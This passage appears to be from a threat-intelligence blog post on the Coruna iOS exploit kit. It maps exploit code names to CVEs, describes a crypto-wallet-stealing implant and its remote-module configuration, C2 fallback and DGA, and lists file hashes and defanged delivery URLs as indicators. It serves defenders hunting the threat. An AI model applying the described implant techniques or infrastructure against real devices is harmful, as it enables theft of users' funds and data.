style="vertical-align: baseline;">14.5 → 15.7.6</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">15.7.7, 16.5.1</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2023-32434</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PE</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Parallax</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16.4 → 16.7</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">17.0</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2023-41974</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PE</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Gruber</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">15.2 → 17.2.1</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16.7.6, 17.3</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">No CVE</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PPL Bypass</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Quark</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">13.X</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">14.5</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">No CVE</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PPL Bypass</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Gallium</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">14.x</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">15.7.8, 16.6</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2023-38606</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PPL Bypass</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Carbone</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">15.0 → 16.7.6</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">17.0</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">No CVE</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PPL Bypass</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Sparrow</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">17.0 → 17.3</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16.7.6</span><span style="vertical-align: baseline;">, 17.4</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2024-23225</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PPL Bypass</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Rocket</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">17.1 → 17.4</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16.7.8, 17.5</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2024-23296</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="center" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 1: Table with mapping CVE to code names</span></div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Photon and Gallium are exploiting vulnerabilities that were also used as zero-days as part of </span><a href="https://securelist.com/operation-triangulation/109842/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Operation Triangulation</span></a><span style="vertical-align: baseline;">, discovered by Kaspersky in 2023. The Coruna exploit kit also embeds reusable modules to ease the exploitation of the aforementioned vulnerabilities. For example, there is a module called </span><code style="vertical-align: baseline;">rwx_allocator</code><span style="vertical-align: baseline;"> using multiple techniques to bypass various mitigations preventing allocation of RWX memory pages in userland. The kernel exploits are also embedding various internal modules allowing them to bypass kernel-based mitigations such as kernel-mode PAC.</span></p> <h3><span style="vertical-align: baseline;">The Ending Payload</span></h3> <p><span style="vertical-align: baseline;">At the end of the exploitation chain, a stager binary called </span><code style="vertical-align: baseline;">PlasmaLoader</code><span style="vertical-align: baseline;"> (tracked by GTIG as PLASMAGRID), using com.apple.assistd as an identifier, facilitates communication with the kernel component established by the exploit. The loader is injecting itself into powerd, a daemon running as root on iOS.</span></p> <p><span style="vertical-align: baseline;">The injected payload doesn’t exhibit the usual capabilities that we would expect to see from a surveillance vendor, but instead steals financial information. The payload can decode QR codes from images on disk. It also has a module to analyze blobs of text to look for </span><a href="https://www.blockplate.com/pages/bip-39-wordlist" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">BIP39</span></a><span style="vertical-align: baseline;"> word sequences or very specific keywords like “backup phrase” or “bank account.” If such text is found in Apple Memos it will be sent back to the C2.</span></p> <p><span style="vertical-align: baseline;">More importantly, the payload has the ability to collect and run additional modules remotely, with the configuration retrieved from </span><code style="vertical-align: baseline;">http://&lt;C2 URL&gt;/details/show.html</code><span style="vertical-align: baseline;">. The configuration, as well as the additional modules, are compressed as 7-ZIP archives protected with a unique hard-coded password. The configuration is encoded in JSON and simply contains a list of module names with their respective URL, hash and size.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>{ "entries": [ { "bundleId": "com.bitkeep.os", "url": "http://&lt;C2URL&gt;/details/f6lib.js", "sha256": "6eafd742f58db21fbaf5fd7636e6653446df04b4a5c9bca9104e5dfad34f547c", "size": 256832, "flags": { "do_not_close_after_run": true } } ... ] }</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">As expected, most of all identified modules exhibit a uniform design; they are all placing function hooks for the purpose of exfiltrating cryptocurrency wallets or sensitive information from the following applications:</span></p> <ul> <li role="presentation"><code style="vertical-align: baseline;">com.bitkeep.os</code></li> <li role="presentation"><code style="vertical-align: baseline;">com.bitpie.wallet</code></li> <li role="presentation"><code style="vertical-align: baseline;">coin98.crypto.finance.insights</code></li> <li role="presentation"><code style="vertical-align: baseline;">org.toshi.distribution</code></li> <li role="presentation"><code style="vertical-align: baseline;">exodus-movement.exodus</code></li> <li role="presentation"><code style="vertical-align: baseline;">im.token.app</code></li> <li role="presentation"><code style="vertical-align: baseline;">com.kyrd.krystal.ios</code></li> <li role="presentation"><code style="vertical-align: baseline;">io.metamask.MetaMask</code></li> <li role="presentation"><code style="vertical-align: baseline;">org.mytonwallet.app</code></li> <li role="presentation"><code style="vertical-align: baseline;">app.phantom</code></li> <li role="presentation"><code style="vertical-align: baseline;">com.skymavis.Genesis</code></li> <li role="presentation"><code style="vertical-align: baseline;">com.solflare.mobile</code></li> <li role="presentation"><code style="vertical-align: baseline;">com.global.wallet.ios</code></li> <li role="presentation"><code style="vertical-align: baseline;">com.tonhub.app</code></li> <li role="presentation"><code style="vertical-align: baseline;">com.jbig.tonkeeper</code></li> <li role="presentation"><code style="vertical-align: baseline;">com.tronlink.hdwallet</code></li> <li role="presentation"><code style="vertical-align: baseline;">com.sixdays.trust</code></li> <li role="presentation"><code style="vertical-align: baseline;">com.uniswap.mobile</code></li> </ul> <p><span style="vertical-align: baseline;">All of these modules contain proper logging with sentences written in Chinese:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>&lt;PlasmaLogger&gt; %s[%d]: CorePayload 管理器初始化成功，尝试启动...</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">This log string indicates the CorePayload Manager initialized successfully</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Some comments, such as the following one, also include emojis and are written in a way suggesting they might be LLM-generated.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>&lt;PlasmaLogger&gt; %s[%d]: [PLCoreHeartbeatMonitor] ✅ 心跳监控已启动 (端口=0x%x)，等待 CorePayload 发送第一个心跳...</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Network communication is done over HTTPs with the collected data encrypted and POST’ed with AES using the SHA256 hash of a static string as key. Some of the HTTP requests contain additional HTTP headers such as </span><code style="vertical-align: baseline;">sdkv</code><span style="vertical-align: baseline;"> or </span><code style="vertical-align: baseline;">x-ts,</code><span style="vertical-align: baseline;"> followed by a timestamp. The implant contains a list of hard-coded C2s but has a fallback mechanism in case the servers do not respond. The implant embeds a custom domain generation algorithm (DGA) using the string “lazarus” as seed to generate a list of predictable domains. The domains will have 15 characters and use .xyz as TLD. The attackers use Google's public DNS resolver to validate if the domains are active.</span></p> <h3><span style="vertical-align: baseline;">Conclusion</span></h3> <p><span style="vertical-align: baseline;">Google has been a committed participant in the </span><a href="https://www.gov.uk/government/publications/the-pall-mall-process-declaration-tackling-the-proliferation-and-irresponsible-use-of-commercial-cyber-intrusion-capabilities" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Pall Mall Process</span></a><span style="vertical-align: baseline;">, designed to build consensus and progress toward limiting the harms from the spyware industry. Together, we are focused on developing international norms and frameworks to limit the misuse of these powerful technologies and protect human rights around the world. These efforts are built on earlier governmental actions, including </span><a href="https://www.federalregister.gov/documents/2023/03/30/2023-06730/prohibition-on-use-by-the-united-states-government-of-commercial-spyware-that-poses-risks-to" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">steps taken</span></a><span style="vertical-align: baseline;"> by the US Government to limit government use of spyware, and a </span><a href="https://2021-2025.state.gov/joint-statement-on-efforts-to-counter-the-proliferation-and-misuse-of-commercial-spyware/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">first-of-its-kind international commitment</span></a><span style="vertical-align: baseline;"> to similar efforts.</span></p> <h3><span style="vertical-align: baseline;">Acknowledgements</span></h3> <p><span style="vertical-align: baseline;">We would like to acknowledge and thank </span><a href="http://projectzero.google" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Project-Zero</span></a><span style="vertical-align: baseline;"> and Apple Security Engineering &amp; Architecture team for their partnership throughout this investigation.</span></p> <h3><span style="vertical-align: baseline;">Indicators of Compromise (IOCs)</span></h3> <p><span style="vertical-align: baseline;">To assist the wider community in hunting and identifying activity outlined in this blog post, we have included IOCs in a </span><a href="https://www.virustotal.com/gui/collection/8f6035fed41b481f604ad0336a637dce1ddaec6670e1497f38d4fca246fda4ce" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">free GTI Collection</span></a><span style="vertical-align: baseline;"> for registered users.</span></p> <h4><span style="vertical-align: baseline;">File Indicators</span></h4> <p><span style="vertical-align: baseline;">Hashes of the implant and its modules delivered from the crypto related websites.</span></p> <h5><span style="vertical-align: baseline;">Implant</span></h5></div> <div class="block-paragraph_advanced"><div align="center"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">bundleId</span></strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">SHA-256</span></strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">com.apple.assistd</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">2a9d21ca07244932939c6c58699448f2147992c1f49cd3bc7d067bd92cb54f3a</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Modules</span></h5></div> <div class="block-paragraph_advanced"><div align="center"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">bundleId</span></strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">SHA-256</span></strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">com.apple.springboard</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">18394fcc096344e0730e49a0098970b1c53c137f679cff5c7ff8902e651cd8a3</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">com.bitkeep.os</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">6eafd742f58db21fbaf5fd7636e6653446df04b4a5c9bca9104e5dfad34f547c</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">com.bitpie.wallet</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">42cc02cecd65f22a3658354c5a5efa6a6ec3d716c7fbbcd12df1d1b077d2591b</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">coin98.crypto.finance.insights</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">0dff17e3aa12c4928273c70a2e0a6fff25d3e43c0d1b71056abad34a22b03495</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">org.toshi.distribution</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">05b5e4070b3b8a130b12ea96c5526b4615fcae121bb802b1a10c3a7a70f39901</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">exodus-movement.exodus</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">10bd8f2f8bb9595664bb9160fbc4136f1d796cb5705c551f7ab8b9b1e658085c</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">im.token.app</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">91d44c1f62fd863556aac0190cbef3b46abc4cbe880f80c580a1d258f0484c30</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">com.kyrd.krystal.ios</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">721b46b43b7084b98e51ab00606f08a6ccd30b23bef5e542088f0b5706a8f780</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">io.metamask.MetaMask</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">25a9b004cf61fb251c8d4024a8c7383a86cb30f60aa7d59ca53ce9460fcfb7de</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">org.mytonwallet.app</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">be28b40df919d3fa87ed49e51135a719bd0616c9ac346ea5f20095cb78031ed9</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">app.phantom</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">3c297829353778857edfeaed3ceeeca1bf8b60534f1979f7d442a0b03c56e541</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">com.skymavis.Genesis</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">499f6b1e012d9bc947eea8e23635dfe6464cd7c9d99eb11d5874bd7b613297b1</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">com.solflare.mobile</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">d517c3868c5e7808202f53fa78d827a308d94500ae9051db0a62e11f7852e802</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">com.global.wallet.ios</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">4dfcf5a71e5a8f27f748ac7fd7760dec0099ce338722215b4a5862b60c5b2bfd</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">com.tonhub.app</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">d371e3bed18ee355438b166bbf3bdaf2e7c6a3af8931181b9649020553b07e7a</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">com.jbig.tonkeeper</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">023e5fb71923cfa2088b9a48ad8566ff7ac92a99630add0629a5edf4679888de</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">com.tronlink.hdwallet</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">f218068ea943a511b230f2a99991f6d1fbc2ac0aec7c796b261e2a26744929ac</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">com.sixdays.trust</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">1fb9dedf1de81d387eff4bd5e747f730dd03c440157a66f20fdb5e95f64318c0</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">com.uniswap.mobile</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">4dc255504a6c3ea8714ccdc95cc04138dc6c92130887274c8582b4a96ebab4a8</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Network Indicators</span></h4> <h5><span style="vertical-align: baseline;">UNC6353 Indicators</span></h5></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%;"> <tbody> <tr> <td style="width: 99.9609%;"> <p><strong><span style="vertical-align: baseline;">URL delivering Coruna exploit kit</span></strong></p> </td> </tr> <tr> <td style="width: 99.9609%;"> <p>http://cdn[.]uacounter[.]com/stat[.]html</p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">UNC6691 Indicators</span></h5></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">URLs delivering Coruna exploit kit</span></strong></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://ai-scorepredict[.]com/static/analytics[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://m[.]pc6[.]com/test/tuiliu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">http://ddus17[.]com/tuiliu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://goodcryptocurrency[.]top/details/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">http://pepeairdrop01[.]com/static/analytics[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://osec2[.]668ddf[.]cc/tuiliu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://pepeairdrop01[.]com/static/analytics[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://ios[.]teegrom[.]top/tuiliu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://i[.]binaner[.]com/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://ajskbnrs[.]xn--jor0b302fdhgwnccw8g[.]com/gogo/list[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://sj9ioz3a7y89cy7[.]xyz/list[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://65sse[.]668ddf[.]cc/tuiliu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://sadjd[.]mijieqi[.]cn/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://mkkku[.]com/static/analytics[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://dbgopaxl[.]com/static/goindex/tuiliu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://w2a315[.]tubeluck[.]com/static/goindex/tuiliu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://ose[.]668ddf[.]cc/tuiliu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">http://cryptocurrencyworld[.]top/details/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://iphonex[.]mjdqw[.]cn/tuiliu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">http://goodcryptocurrency[.]top/details/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://share[.]4u[.]game/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://26a[.]online/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://binancealliancesintro[.]com/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://4u[.]game/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">http://bestcryptocurrency[.]top/details/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://b27[.]icu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://h4k[.]icu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://so5083[.]tubeluck[.]com/static/goindex/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://seven7[.]vip/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">https://y4w[.]icu/group[.]html</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: 